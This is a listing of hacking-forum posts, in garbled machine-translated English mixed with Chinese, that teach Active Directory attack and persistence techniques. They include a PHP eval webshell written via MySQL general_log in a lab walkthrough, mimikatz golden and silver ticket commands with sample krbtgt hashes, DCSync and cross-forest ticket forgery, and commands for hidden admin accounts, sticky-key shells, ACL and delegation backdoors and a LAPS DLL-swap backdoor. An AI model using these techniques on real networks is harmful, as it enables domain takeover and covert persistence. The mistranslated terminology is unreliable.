'123456' -b dc=pentest,dc=com '((samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto 3.2.2 约束委派的利用 3.2.2.1 常见情况 It is known that in the case of constrained delegation, the service user can only obtain the service ST of a certain user or host, and can only use simulated users to access specific services, and cannot obtain the user's TGT. If you can obtain the plaintext password or hash of the user who has enabled the constrained delegation, you can forge the S4U request, and then forge the service user to access the service ST with the permissions of any account. 先抓出主机账户的 NTLM Hash 值:mimikatz.exe 'privilege:debug' 'sek
  6. UKhackteam

    Title: VulnStack ATT\u0026CK 1 Range

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    VulnStack ATTCK 1 靶场 环境 信息收集 端口探测 Only 80, 3306 are open 目录扫描 Access port 80 and found that the home page is PHP probe: Directory scan: Discover phpmyadmin. 漏洞挖掘 phpmyadmin Try to log in with password: root:root login is successful. There are many ways to getshell in the phpmyadmin background Let's first look at the regular select into outfile: Here secure_file_priv is null, and writing and writing are not allowed. Give up this method and try writing out the webshell by MySQL general_log. First look at the configuration of global variables show global variables like '%general%': The general log is not enabled here, so I will open it myself and save the file custom: 1 2 SET GLOBAL general_log='ON' SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php' The absolute path here is obtained through the previous probe. Then write webshell select '?php @eval($_POST['bbll]);': Ant Sword Connection: 内网渗透 First check the number of system digits: 1 wmic cpu get addresswidth Use cs to generate a Trojan and upload: implement: Going online, directly with administrator permissions: View user permissions: Check the current login domain: View users within the domain: View the host in the domain: View Domain: dump password: 横向移动 After DC is online, use hashdump dump krbtgt NTLM Hash: Make golden notes:
  7. UKhackteam

    Title: DCSync Attack

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    DCSync 攻击 In August 2015, Benjamin Delpy (the author of the artifact Mimikatz) and Vincent Le Toux released a new version of Mimikatz, adding the DCSync function. Imitate a domain controller DC and request data from a real domain controller, such as password hash value of the account. Before DCSync, you need to log in to the domain server to run the code on the domain server before you can get it. The biggest feature of DCSync is that you can remotely obtain the desired user password information through synchronous replication of domain data without logging into the domain server. It should be noted that if the object attacked by DCSync is a RODC domain controller, it will be invalid because RODC cannot participate in the replication of synchronous data. 原理 The principle of DCSync is very clear, and it uses data synchronous replication between domain controllers. Discover the target domain controller in the network; Directory Replication Service (DRS) Remote Protocol Samba wiki's description of GetNCChanges includes : When a DC (become a client DC) wants to get data from other DCs (become a server DC), the client DC will initiate a GetNCChanges request to the server DC. The data responded includes data that needs to be synchronized. If there is a lot of data that needs to be synchronized, the above process will be repeated. After all, there is limited data for each response. 前提 If a user wants to launch a DCSync attack, he must have the following permissions : 1. Replicating Directory Changes (DS-Replication-Get-Changes) 2. Replicating Directory Changes All (DS-Replication-Get-Changes-All) 3. Replicating Directory Changes In Filtered Set That is: By default, the domain administrator group has this permission. 攻击 防御 The principle of DCSync attack is to simulate the synchronous replication of data between servers initiated by the domain controller. The best way to defend is to set a whitelist of domain controllers. In the domain, the number of domain controllers, IP address, and MAC address are very clear assets, and these assets are set on a whitelist that allows synchronization. Non-whitelisted IPs do not allow data synchronization Scripts for obtaining all IPs in the domain : 1 2 3 PowerShell:Get-ADDomainController -filter * | select IPv4Address or [System.DirectoryServices.ActiveDirectory.Domain]:GetCurrentDomain().DomainControllers | select IPAddress Detect synchronous replication of domain controller data from outside the whitelist on network devices
  8. UKhackteam

    Title: Domain attacks based on domain trust relationships

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    基于域信任关系的域攻击 域信任 The trust relationship between domains is established so that users of one domain can easily access resources in other domains, and also facilitate the management and maintenance of the domain network. While this model brings convenience, there are also many places that can be exploited by malicious attackers. Domain trust relationships can be of one-way\two-way trust, passable\non-transmitted trust, internal\external trust, cross link trust, etc. For example, there is a one-way transferable external trust relationship between the 2 domains. The domain trust relationship within the same forest is generally implicit in two-way transitive internal trust relationship. deploy: The parent-child trust relationship is the most common domain trust relationship. When adding a new domain within the same forest, the most common one is the child domain pattern (Parent-Child) or the tree root pattern (Tree-Root). These two modes will establish a parent-child trust\tree-root trust relationship, which are both two-way passable internal trust relationships. Cross-domain link trust refers to establishing a direct trust relationship between two subdomains of the same forest. Because in the same forest, the organizational relationship of a domain is a tree-like structure. From one subdomain to another, you need to find the Forest Root from the branch's subdomain, and then continue to find the other subdomain from the root domain. Cross-domain linking is equivalent to establishing a shortcut trust relationship between the 2 subdomains to reduce the time and steps of authentication and authorization. Internal trust refers to the trust relationship between the internal domains of the forest. Accordingly, External Domain Trust refers to the trust relationship between the domain and the domain outside the forest. There is also a kind of MIT trust (the Kerberos protocol and standard are proposed by MIT), which is a trust relationship between Windows domains and non-Windows domains. Due to the few applications, this article will not discuss this type of domain trust relationship. 跨域认证和资源访问授权 When a domain trust relationship is established between two domains, a shared inter-domain key (Inter-Realm Key, abbreviated as IRKey) is established, which is equivalent to Krbtgt. However, IRKey is used for authentication between two domains that are trusted, while Krbtgt is used for authentication between AC and KDC of the same domain server. The authentication and authorization process between trust domains is roughly similar to the authentication and authorization in the same domain, but there are still many differences. Jack initiates an authentication request to DC1, and the data is encrypted by Jack's password NTLM value; DC1 uses Jack's password NTLM value to verify the received authentication request, returning an authenticated TGT ticket to Jack; Jack uses TGT tickets to initiate an authorization request to DC1, and initiates a TGS_REQ request to access the file service in DC2; DC1 checks that the file service is in DC2 and returns a redirectable TGT (Referral TGT), indicating that it needs to be transferred to DC2, and uses IRKey to encrypt the authentication information in the redirectable TGT; After Jack receives the TGT that can be transferred, according to the prompt information, use the TGT to initiate a request to access the file service in DC2 TGS_REQ; After DC2 receives the request, it uses IRKey to verify the authentication information in TGT, and returns a TGS ticket that allows access to the file service. Some of the information in the ticket is encrypted using the password NTLM value of the service account running the file service; Jack uses the received TGS tickets to access file services in DC2; The service account of the file service service uses password NTLM value verification TGS When a trust relationship is established between two domains, the other party's SPN, DNS and other information will be archived in the global domain database for easy access. For example, in the above figure, DC1 will archive all service SPN, DNS and other information in DC2. If the service Jack requests access is in DC1's global database, it will return to the TGT. If it is not there, if DC1 has a parent domain, DC1 will request the parent domain until the forest's root domain server. If DC1 itself is the root server (in this case, DC1 is the root domain server), it will directly tell Jack that the service requested access does not exist. A forest has only one global database. SIDHistory 版跨域黄金票据 In a domain, once we obtain the NTLM value of Krbtgt, we can construct gold notes, which fake it to arbitrary users in the domain, including administrators, to obtain full access control rights to the domain. But in different domains of the same forest, the gold notes are no longer valid. Let’s review the major elements of gold notes, namely the domain name, the domain SID (Security Identifier), the NTLM value of the Krbtgt user password, and the user RID (Relative Identifier, without special indication, the Mimikatz tool will set the RID to the domain administrator’s RID). Different domains have different Krbtgts, causing gold notes to fail between different domains. 1 mimikatz.exe 'kerberos:golden /user:anyusername /domain:lab.adsec.com /sid:S-1-5-21-2732272027-1570987391-2638982533 /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt' exit Different domains have different Krbtgts, causing gold notes to fail between different domains. It can be seen that when constructing gold notes for the lab.adsec.com domain, they are valid in this domain, and the notes are invalid in the parent domain adsec.com. If the SIDHistory property of a user is set to the high-privileged group or the user's ID, the user also has permissions equivalent to the high-privileged group or the user. If we add the SID of the domain administrator group of the target domain into the fake gold notes, we can obtain the domain administrator rights of the target domain. The combination of gold notes and SIDHistory can realize cross-domain gold notes. Since the SID of each domain is different, gold notes superimposed on SIDHistory are not universal. According to Microsoft's description, within the same domain forest, the enterprise management group EA (Enterprise Administrators) will automatically be added to the domain administrator group of this domain by all domains within the forest, and the EA only exists in the root domain, so the SID of the enterprise management group EA is fixed to the SID of the root domain plus a fixed RID, that is, 519. Therefore, if the SIDHistory attribute is set using the SID of the Enterprise Management Group EA and combined with the gold notes, cross-domain gold notes for all domains can be realized on the premise that only obtains the NTLM value of any domain krbtgt account, this bill can be referred to as the SIDHistory version of gold notes. Of course, you can also add the administrator group SID of a specified domain in the forest to SIDHistory, but such gold bills are only valid for the specified domain and are invalid for other domains. It is not as universal as using the bills of the Enterprise Admin SID. 1 mimikatz.exe 'kerberos:golden /user:anyusername sids:[sid for EA group] /sid:[sid for lab.adsec.com domain] /domain:lab.adsec.com /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt' exit The gold notes are still constructed in the lab.adsec.com domain, but the SIDS parameter is added, using the root domain's enterprise administrator SID as the parameter value, i.e. the SIDHistory version of the gold notes, which are valid for both the lab.adsec.com and adsec.com domains. It should be noted here that the basis for implementing the SIDHistory version of gold notes is the trust relationship within the forest, because if it is not the trust relationship within the forest, the SIDHistory will be filtered out by Microsoft's SID Filter rules and thus invalid, but there will be no SID Filter rules within the forest. This is why it is said that forests rather than domains are the security boundaries. IRKey 版跨域黄金票据 When a domain trust relationship is established between two domains, a shared inter-domain key (Inter-Realm Key, abbreviated as IRKey) needs to be established. Its function is equivalent to Krbtgt, but it is used between two domains that trust each other, and Krbtgt is used between the AC and KDC of the same domain server. As long as you obtain the NTLM value of the krbtgt account in any domain inside the forest, you can obtain control of all domains in the forest through the SIDHistory version of the gold notes. Therefore, in order to defend, the NTLM value of the krbtgt account in all domains within the forest must be modified 2 times. In a multi-domain environment, IRKey is similar to the host account. The system automatically modifys NTLM every 30 days by default. Therefore, even if the NTLM of the krbtgt account in all domains in the forest is modified twice, the NTLM of IRKey is likely to not change (the low probability is that the NTLM modification of krbtgt happens to meet the IRKey modification cycle). Similar to silver notes, you can use IRKey to forge inter-domain transitive bills (Inter-Realm Referral TGT) to obtain domain administrator rights for the target domain, and then combine the SIDHistory version of gold notes in the previous section to obtain control of the entire forest again. What you need to note here is that SID is the SID of the target domain. In the domain, most accounts with the ‘$’ symbol are Computer accounts, but the accounts with the ‘$’ symbol in the User group are trust accounts. You can obtain all User accounts with the ‘$’ symbol through the Powershell command Get-ADUser, which comes with the domain server. In the figure below, the ADSEC$ account is a trust account and belongs to the Users group. There are 2 ways to get the NTLM value of a trusted account. Dcsync 获取信任账号的 NTLM 值 The following figure uses Dcsync method to obtain the NTLM value of the trusted account adsec$ in the lab.adsec.com domain. The result shows that the type of the account is TRUST_ACCOUNT lsadum 获取信任账号的 NTLM 值 Use lsadump:trust/patch method. From the figure below, you can see two different NTLM values: [IN] LAB.ADSEC.COM - ADSEC.COM and [OUT] ADSEC.COM - LAB.ADSEC.COM, which are the values used when accessing from other domains and from within to this domain. Because the two-way trust relationship is actually a superposition of 2 one-way trust relationships, there will be 2 keys. Here we want to construct the IRKey version of gold notes from this domain to access other domains inside the forest, so use the NTLM value IN. Since IRKey exists between trust domains inside the forest and also between forests outside the forest, they can be used for transfer to certification. In SIDHistory version of gold notes, it cannot be used between forests due to the SID Filter rule, but the IRKey version does not involve this security filtering rule and is still valid. The IRKey version of gold notes can be divided into two types inside the forest and outside the forest. The operation method is similar. Here we focus on introducing the IRKey version of gold notes inside the forest. Authentication of inter-domain transvoting bills relies on IRKey encryption. Under the premise that we know IRKey, any user holding the trust domain of the IRKey can be forged. In the test, we construct a ticket and tell the adsec.com domain that the user who switched to the authenticated is the administrator, and SIDHistory is the enterprise administrator of the root domain. After the construction is successful, you have the administrator rights of adsec.com, but you cannot access lab.adsec.com with high permissions, because the constructed ticket is the administrator ticket to the adsec.com domain. After obtaining high permissions of the adsec.com domain, you can obtain the NTLM value of the krbtgt account of the domain. On this basis, you can continue to construct the SIDHistory version of gold notes, so that you can obtain control of the entire forest. 域信任关系的获取 In large domain networks, the organizational model and trust relationship of the domain network are different due to various reasons such as company mergers and acquisitions, enterprise restructuring, and business expansion. These different trust relationships are stored in the forest root domain database (Global Catalog), and there are many ways to obtain this data PowerView and BloodHound tools provide a variety of ways to obtain domain trust relationships and can visualize trust relationships. The following will introduce the method and process of obtaining the entire forest trust relationship from the host of a subdomain within the forest. Powerview: First use the Get-NetForestTrust command to obtain a forest-level trust relationship. There are 2 forests, which are adsec.com, testlab.com, and two forests to establish a two-way trust relationship. Use the Get-NetDomainTrust command to obtain the domain-level trust relationship of the adsec.com domain, that is, the forest internal relationship, and there are two forest internal relationships: ParentChild trust relationship to lab.adsec.com and TreeRoot to res.com domain. In the test, the parameter adsec.com of Get-NetDomainTrust indicates the query of the trust relationship on the specified domain. Generally, as long as the specified domain trusts the domain where the current query host is located, the other party's trust relationship data can be obtained. When querying, you can use Export-CSV -NoTypeInformation to convert the output results to CSV format, with the command Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts-mapping.csv. Then use the TrustVisualizer tool for visual output. Finally, use the yED tool to convert it to a visual graphics. 利用域信任实现跨域攻击 If a user in a domain (assuming that the user is an eviluser) wants to access resource access in other domains, first make sure that the target domain trusts the domain where the current user is located. This is the basic premise, and then one of the following 3 conditions must be met. eviluser is added to a group by the target domain, which has resource access permissions in the target domain; eviluser is added as a local group by some host or server in the target domain, for example by a server as a local administrator group; The current user is added as the Security Principal of the access control ACL by some domain objects in the target domain. For example, you can modify the password of a domain user object. Some people may be wondering, according to the previous introduction, since you can obtain the NTLM value of the Krbtgt account or the IRKey account of the current domain, you can obtain control of the entire forest, there is no need to introduce cross-domain attacks within the forest. This is because in actual situations, it is not necessary to successfully obtain the NTLM value of the Krbtgt account or IRKey account of a certain domain, such as few domain resources, strict configuration, timely system updates, etc. At this time, you need to detour to a larger domain to have more opportunities to obtain the NTLM value of the Krbtgt account or IRKey account, because the more resources, the greater the probability of fragility. To implement cross-domain attacks on domain A from the current user eviluser, you must first ensure that the current user has the permission to access domain A resources across domains, so the attack process should include several steps From the database of the current domain, enumerate which domains trust the current domain (out). Since it is attacking other domains, there is no need to pay attention to which external domains trust (in) the current domain is trusted. This can be easily obtained from the method introduced in the previous section. Using trust relationships, enumerate which groups in the target domain contain users of foreign domains. It should be explained here that there are usually 3 types of groups in the domain. The first is Domain Local Groups, which can add cross-domain and cross-forest group members, which is also the most common group; the second is Global Groups, which does not allow any cross-domain group members, even the same forest, and has higher authority, such as enterprise management groups; the third is Universal Groups, which can add any members in the forest, but cross-forest cannot. In cross-domain attacks within the forest, we only focus on the first and third types of intradomain groups. The memberof attribute of a user is calculated by the member attribute of the group, provided that the member attribute of the group has been updated to the global directory database (Global Catalog). If a user is added as a member of the generic group by another domain in the forest, the generic group updates the member attribute to the forest's global directory database, and the user's memberof attribute will be updated through calculations; When a user is added as a member of the domain local group by another domain in the forest, since the domain local group does not update the memberf attribute to the global directory database, the user's memberf attribute will not be calculated to be updated. Therefore, even if we have permission to query the forest's global directory database, we can only get the member attributes added to the common groups of other domains. To obtain the member attributes added to the local groups of other domains, we need to poll all domains one by one Enumerate the local groups of hosts\servers in the target domain, and see which foreign users are added to the local groups of hosts\servers. You can enumerate them through GPO group policy, or you can detect them one by one through PowerView. Of course, all detections of BloodHood automation are all. Enumerate the ACLs of objects in the target domain and check whether there is a domain object ACL that contains foreign domain users. Generally speaking, any user can view the ACLs of all domain objects, and the ACLs of all domain objects are stored in the global database, which can be easily enumerated. PowerView provides the Get-DomainObjectACL command for easy enumeration The second filter is performed on the users filtered in steps 2, 3, and 4, and the users belonging to the current domain are selected as attack objects in the current domain, such as obtaining the target user's NTLM value or TGT ticket, the attack method of this domain. Use step 3 to attack the user NTLM value or TGT ticket to cross-domain access, enter the target domain, and then attack to obtain the target domain's Krbtgt account or IRKey account's NTLM value. If the conditions are not mature, continue the above steps and gradually enter more domains to find opportunities. When a user is joined to a group by the forest external domain, it will appear in the CN=ForeignSecurityPrincipals,DC=domain,DC=com group of the external target domain, which is equivalent to the user's representative or alias in the external domain, and all foreign users in the domain have the same SID, which is the effect of the cross-forest SID filtering security mechanism. So just enumerate the ForeignSecurityPrincipals group and you can know which users have access to this external forest, assuming that the user results collection is ExternalUsers. Next, check whether the users in our current domain are included. If so, directly attack these users to obtain NTLM values or TGT tickets, thereby obtaining resource access rights to the forest external domain. If not, check whether ExternalUsers contains users of our current forest, assuming the result collection is InternalUsers. Query the domain where InternalUsers are located in the current forest. Targeting these domains, using the cross-domain attack method inside the forest, attacking these domains, obtaining permissions to enter these domains, and then attacking users in InternalUsers from these domains, thereby obtaining resource access rights to external domains. This is a bypass attack SID 过滤机制 Microsoft claims that forests are the security boundary of the active directory, but cross-forest attacks have appeared in 2005. First explain what SIDHistory and SID filtering mechanisms are SIDHistory SIDHistory (ExtraSids field in the PAC structure) is to facilitate users' migration between domains. When a user migrates to a new domain, the original SID and some SIDs of the group can be added to the SIDHistory property of the new user in the new domain. When this new user accesses a resource, it is determined that access is denied or allowed based on the matching of SID or SIDHistory in the resource ACL. Therefore, SIDHistory is equivalent to having one or more group attributes, and permissions are expanded In a cross-domain trust relationship within the same forest, the SIDHistory attribute is not filtered by the SID filter protection mechanism. If the SIDHistory attribute of a subdomain adds the SID of the enterprise administrator (the enterprise administrator must be the forest administrator), the subdomain has the forest administrator authority and the permissions are expanded, so the SIDHistory was later modified to a protected attribute. In the trust relationship across forests, the SIDHistory attribute is filtered by the SID filtering mechanism and no longer has the above privileged attributes. This is also one of the reasons why forests are the security boundaries of the active directory. SID 过滤机制 When a user's TGT is forwarded to a new domain through a domain trust relationship, the PAC (privileged attribute certificate) in the TGT contains the user's SID and SIDHisto
  9. UKhackteam

    Title: Hidden Domain Backdoor

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    隐蔽域后门 Hide user Hidden program Sticky bonds 常见后门方式 隐藏用户 1 2 net user yincang$ 123456qaq /add net localgroup administrators yincang$ /add 隐蔽程序 NtGodMode NtGodMode.exe Gate of God, no matter how the administrator changes the password, he can log in to the system with any password. https://blog.csdn.net/oceanark/article/details/51902042 https://www.jb51.net/article/14702.htm https://www.52pojie.cn/forum.php?mod=viewthreadtid=19817page=1 命名管道 Named Pipe, \Server\PipeName\Path IP + Port is a commonly used remote connection method. Named pipes do not require specific ports, and are mixed in port 135. Log in without opening the port 粘滞键 Press the shift key five times continuously, and the input method selector will pop up. You can replace cmd with input method to obtain shell 域内隐蔽后门 目录 ACL A deep hidden backdoor based on the ACL (Access Control Link) access control chain based on the in-domain object. In the domain network, the domain group policies and scripts are stored in the SYSVOL directory of the domain server. All domain users can freely access it, but only some high-privilege users have the permission to modify it. When an account within the domain logs into the domain, it will query and execute (if there is any change) its own domain policy and execution script. To a certain extent, if you control the SYSVOL directory, you have a high probability of controlling the domain network. If the login log audit software is deployed in the domain, the login and usage of high-authorized accounts in the domain will be strictly audited. Therefore, the method of using high-privileged users to control the domain network is not very concealed Generally speaking, domain policies force periodically modify the password of high-privileged users, but this mandatory requirement may not be present for low-privileged users. Moreover, many users in the domain are often hard to log in and use. If a user with low permissions has the SYSVOL directory modification permission, the audit software will not be discovered by the audit software when logging in to the domain because the permissions are not high. The protection and monitoring software has not paid much attention to the ACLs of the directory, so this method is a very practical hidden backdoor method. Use regular user eviluser to log in to the domain client Windows 7. Connecting to the domain server through net use can view the directory shared by the access server, but there is no write permission. The Policies directory has been added write permissions (or full control) through the resource management tool and inherits it to all subdirectories and files The Security tab of the Policies directory, eviluser is individually used as the permission user. Under normal circumstances, ordinary users only have the Authenticated users user group permissions. After the ACL permissions of the directory in the server are set successfully, in the original IPC connection, the ordinary domain user eviluser successfully wrote data to the Policies directory, proving that he has write permissions to the directory. This allows you to modify the policies and scripts inside, a hidden backdoor. This backdoor method only demonstrates a specific form of ACL backdoor, because there are too many objects in the domain, and there are also many ACL objects that can be manipulated. You can flexibly select the target's ACL as the target to modify it according to your own needs and hide the back door. Of course, regarding ACL detection, Microsoft has also launched a special tool, ACL Scanner. If this type of backdoor can be detected periodically, it can still be detected. 白银票据 In Windows systems, many services run with host accounts, that is, many ServiceAccount accounts are local host accounts, in the format ComputerName$. The following table is a common service running with a host account. Some of the columns on the right have multiple services. For example, WMI services include HOST and RPCSS, which means that you need 2 TGS tickets to access WMI services at the same time. Service name Services required at the same time WMI HOST, RPCSS PowerShell Remoting HOST, HTTP WinRM HOST, HTTP Scheduled Tasks HOST Windows File Share CIFS LDAP LDAP Windows Remote Server RPCSS, LDAP, CIFS The password hash value of the known domain server host account, uses Mimikatz's silver bill function to forge TGS to access the HOST service, run the domain server's SCHTASKS command with domain administrator privileges, and remotely create, view, and delete system tasks. 构造白银票据 1 kerberos:golden /admin:[email protected] /domain:testlab.com /sid:S-1-5-21-2390976136-1701108887-179272945 /target:TESTLABDC02.testlab.com /rc4:36788836f262b9409f102baa22b7a6f3 /service:host /ptt 创建计划任务 修改主机账号的口令策略制作后门 Modify the policy in the host's registry. The specific location is HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters. The key value is DisablePasswordChange. Set to 1, which means that the account password is prohibited; Modify the default 30 days in Group Policy, and the modification location is "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age'. When set to 0, it means infinite length; Group policy directly prohibits the modification of the host account password, which is used to support VDI (virtual desktops Infrastructure) and other types of use. The specific location is "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes" Solution 1 is relatively safe. Since there are snapshots in Group Policy, Scenarios 2 and 3 are more risky 修改主机账号的委派设置权限制作后门 In a domain delegation attack, if a host account is set with a binding delegation, you can use the password hash value and binding delegation of the host account to obtain domain administrator permissions. The prerequisites are: the password hash value and delegation of the host account (both binding and non-binding) If we have multiple stable control points in the domain and obtain the SYSTEM permissions of the current system, we can obtain the password hash value of the current host's host account (the account in the demonstration is win7x86cn$ ) at any time, which meets the first condition; If the SeEnableDelegationPrivilege permission of the win7x86cn$ account is given to the low-privileged login domain user (eviluser) of the local machine, the delegation settings of the win7x86cn$ account can be changed at any time through the eviluser user, so that the second condition can be met It is not possible to modify the object's msDS-AllowedToDelegateTo property by having the object's GenericAll permission. Attackers can only modify the object's SeEnableDelegationPrivilege permission. By default, SeEnableDelegationPrivilege permissions are only available to domain controllers, so we need to detect which group policies applied to these domain controllers have changed the user's SeEnableDelegationPrivilege permission configuration. Generally speaking, the default group policy is "Default Domain Controllers Policy". The permissions of SeEnableDelegationPrivilege are very special. The setting method is to modify the GPO policy file. The location is the domain server\SYSVOL\sysvol\testlab.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf file Add eviluser with SeEnableDelegationPrivilege permission, then eviluser can modify the delegation settings for all users in the domain. The following figure is a test to modify the delegation settings of win7x86cn$ account in the login session of eviluser I checked the delegation settings of this account for win7x86cn. The useraccountcontrol marked red indicates that there is no delegation set. In the middle, Set-DomainObject is used for delegation settings. 16777216 indicates that TRUS TED_TO_AUTH_FOR_DELEGATION is set. The results after setting are queryed through Get-DomainObject. The msds-allowedtodelego option has been changed, and the useraccountcontrol has been changed. 应对此后门的安全策略 The maximum validity period for forced setting of a host account through the domain's group policy is 30 days; Protect the integrity of the {6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf file, that is, the integrity of the key group policy; High-authorized users, settings cannot be delegated When the host account needs to be assigned, it can only be set as a binding delegation. LAPS In the domain network, the host's local administrator is rarely used, but it poses great risks to network security. If an attacker obtains the local administrator's NTLM, he does not have to crack it and can attack other hosts in the domain through PTH. To solve this problem, Microsoft released two patches, KB2871997 and KB2928120 in 2014, and the PTH method failed. If the password of the local administrator of the host in the domain is relatively simple, it may be cracked, and the password can still be used for password guessing or blasting dictionary library, IPC or remote desktop login, etc. In 2015, Microsoft released a local administrator password solution, LAPS (Local Administrator Password Solution), which is used to centrally manage passwords for local administrators of hosts within the domain. Through LAPS production policies, we force the local administrator password of the host within the domain to prevent malicious attackers from using the local administrator password to conduct horizontal attacks within the domain. This solution includes clients and servers, which are installed on the host and domain server respectively LAPS 功能 Collect local administrator accounts according to the policy (maximum one local administrator account is managed) and set a random password that complies with the password policy. Upload the new password to the domain server and store it in the properties of the corresponding host account in the domain Update the new expiration date to the host account attribute Check whether the password of the local administrator account has expired. If the password expires, a new random password will be generated and the relevant attributes of the host account in AD will be updated. LAPS provides two management tools: GUI and AdmPwd.PS script module. After LAPS is installed, you need to use the Set-AdmPwdComputerSelfPermission command of the AdmPwd.PS module to give the host in an OU or the entire domain permission to set its own properties. Each host object can automatically store password statements and password expiration time. In the domain server, you can directly view the password plaintext of the local administrator in the specified host through the GUI. LAPS adds two attributes: ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime to the host account attributes in the domain. The first attribute stores the password plaintext of the local administrator, and the second attribute stores the password expiration time. Here, some readers may ask why plain text passwords are stored instead of some kind of password in ciphertext form. The Find-AdmPwdExtendedRights command of the AdmPwd.PS module can detect which accounts or groups in the domain have permission to read the ms-Mcs-AdmPwd attribute. When detecting AD permissions for a specific domain object, there are 2 things to consider : Which domain subjects can give this AD permission to itself or other domain subjects; Which existing ACEs contain this AD permission and which objects are used by these ACEs. When doing the check for the first thing, Find-AdmPwdExtendedRights does not have control over the detection of security descriptors. In the second thing check, the interface determines the result through 4 aspects : AD object type ACE access mask ACE object type ACE inherited object type During AD object type detection, Find-AdmPwdExtendedRi ghts only analyzes the ACE applied to the OU or computer, and all other container objects are ignored. The parameters when setting permissions using Set-AdmPwdComputerSelfPermission are also OU types. An attacker can give himself permission to read the ms-Mcs-AdmPwd attribute on a non-OU container object msImaging-PSPs type container is not within the scope of detection analysis. If you place computer objects in a container of this type, you can avoid being detected. If a low-privileged user is given full permissions about the container of that type, you can control the properties of the computer in the container, including the ms-Mcs-AdmPwd property. win7x86user is an ordinary user in the domain. NotOu is a msImaging-PSPs type container, which has a machine win7x86cn. On NotOu, win7x86user is given all permissions to the container. The object win7x86cn in the container inherits all permissions The above tests and experiments show that in a domain network with a LAPS environment, LAPS can be effectively used as a hidden backdoor, giving low-privileged users permission to read the local administrator password plaintext at any time, thereby quickly obtaining control of the high-privileged host, and further obtaining domain control permissions through hash value acquisition and other methods. Of course, the premise of all this is that domain control permissions have been obtained. LAPS only deploys an AdmPwd.dll file on the client, which is used to respond to the password change policy from the domain server, and then stores the password plaintext to the ms-Mcs-AdmPwd attribute of the corresponding host account in the server in Kerberos encryption. LAPS originated from a public project. Through the analysis of the public project source code, you can use manual methods to simulate the password modification process. When the client uses the AdmPwd.dll file, Windows does not perform integrity verification or signature verification on the file. Therefore, a tampered DLL can also be used normally. So if the attacker compiles a DLL with similar functions based on the public source code, and adds some functions to the DLL, write the modified password plaintext to the specified location. This allows attackers to obtain the password plaintext at any time, thus having full control over the client According to the installation instructions of LAPS, there are 3 ways to install on the client. Client installation LAPS.x64.msi or LAPS.x86.msi Install on the client using regsvr32.exe AdmPwd.dll If LAPS is installed on the client in the second way, and the directory of AdmPwd.dll is a writable directory for ordinary users, ordinary users can directly replace the original real DLL file with the fake DLL file. You can obtain the password text of the local administrator, obtain the full control of the machine, and achieve the privilege escalation. LAPS is a solution deployed by Microsoft to strengthen password management for local administrators and improve network security, but some flaws in the solution have led to LAPS becoming a tool for attackers to create hidden backdoors. Not only LAPS, but many other software are the same. With the increase of products, while the security is improved, the attack surface exposed to attackers has also been expanded. The road to safety is long.
  10. UKhackteam

    Title: AD Active Directory Management

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    AD 活动目录管理 域和活动目录的概念 域和活动目录的价值 Force security policies and desktop/application environments for terminal computers and users, and can realize batch and automatic deployment, reducing the daily management difficulty and work intensity of IT personnel Access control of various services and resources in the domain (file and print sharing, etc.) can be flexibly combined with the enterprise's hierarchical organizational structure to meet complex management needs such as permission allocation. Unified authentication means can be integrated with a variety of Windows application services (such as Exchange, Sharepoint, etc.) and third-party software to realize single sign-in and improve user's operational experience in switching between multiple services. 域中的角色 DC-Domain Controller Member Server Terminal computer 域控制器中的 AD 数据库文件 AD database file is saved in the C:\Windows\NTDS directory by default When necessary during the AD database maintenance process, you can perform operations such as Wufu start and stop, folder redirection, offline sorting, backup and recovery. 域控制器之间的 AD 数据库同步 The AD database will be replicated synchronously between DCs when changes occur. The frequency and time windows of synchronous replication can be configured and defined. 特殊类型的域控制器 RODC RODC saves read replicas of AD database in domain controller No more RODC changes are allowed locally to be made to the database RODC is suitable for deployment in remote branches without administrative requirements 全局编录服务器 GC GC is a special domain controller, at least one is deployed in one domain GC is used to synchronize data in multi-domain environments and other domains (but not all data is synchronized. Usually, the data that needs to be synchronized only accounts for 5% to 10% of the total AD database) to optimize the efficiency of global or cross-domain search for applications such as Exchange Server. 域和活动目录规划 多域环境的需求 A domain can contain 1 million objects, and most enterprises only need one domain in technology Multi-domain deployment may need to be considered when the following requirements occur: IT management policies require separate or independent IT management boundaries Restructuring or merger affects changes in the domain The transformation and migration of domains require coexistence of new and old domains at the same time 多域的分布式架构 A domain forest can contain multiple domains, and a domain can contain multiple subdomains The namespaces of the parent and child domains (FQDN domain name suffix) must remain the same and continuous 域和域之间的信任关系 信任关系可实现跨域的身份验证和资源访问 If there is no trust relationship between domains, users in each domain can only access resources in this domain Depending on the scenario, some trust relationships exist by default, while some require manual configuration. 站点 A site refers to a network that contains a specific IP subnet in the same domain and is associated with a specific domain controller. The purpose of deploying multiple sites is to optimize the replication and synchronization of DCs between sites, while enabling clients to prioritize communication with nearby DCs and optimize login verification operations. 活动目录的规划 OU Hierarchical Structure Planning User and computer naming specifications Group planning Planning of AD management permissions 活动目录中的对象管理 图形化管理工具 命令行管理工具 DS 系列命令集 dsquery, dsadd, dsmod, dsmove, dsrm, etc. PowerShell 系列命令 Get-ADDomain, New-Aduser, Search-ADAccount, etc. 活动目录中的对象 Object Common objects include: users, groups, computers, etc. Container The system is built-in and is the default logical storage location for some objects. Cannot delete or edit, cannot be further hierarchical Organizational Unit (OU) User-created, used to customize the logical storage location of objects Supports hierarchical structure and allows editing OU(组织单位)规划 Generally, it is necessary to reflect the organizational structure or geographical characteristics of the 